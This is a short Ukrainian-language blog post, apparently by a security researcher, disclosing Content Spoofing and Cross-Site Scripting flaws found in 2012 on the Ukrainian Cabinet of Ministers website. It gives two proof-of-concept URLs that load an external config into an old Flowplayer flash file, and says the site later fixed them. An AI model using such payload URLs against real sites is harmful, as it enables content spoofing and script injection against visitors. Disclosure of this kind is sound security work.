Нові уразливості на www.kmu.gov.ua
23:50 01.05.201531.01.2015
У листопаді, 27.11.2012, я знайшов Content Spoofing та Cross-Site Scripting уразливості на http://www.kmu.gov.ua - сайті Кабінету Міністрів України. Про що найближчим часом сповіщу адміністрацію сайта.
Раніше я вже писав про уразливості на www.kmu.gov.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
01.05.2015
Content Spoofing:
http://www.kmu.gov.ua/swf/flowplayer-3.2.7.swf?config=http://site/1
Cross-Site Scripting:
http://www.kmu.gov.ua/swf/flowplayer-3.2.7.swf?config=http://site/xss
Дані уразливості вже виправлені шляхом оновлення флешки Flowplayer. Багато років вони використовували діряву флешку, після мого листа змінили її на безпечну версію, але не подякували мені за повідомлення про уразливості. Як це завжди робили адміни КМУ та багатьох інших державних сайтів на протязі 2006-2015 років.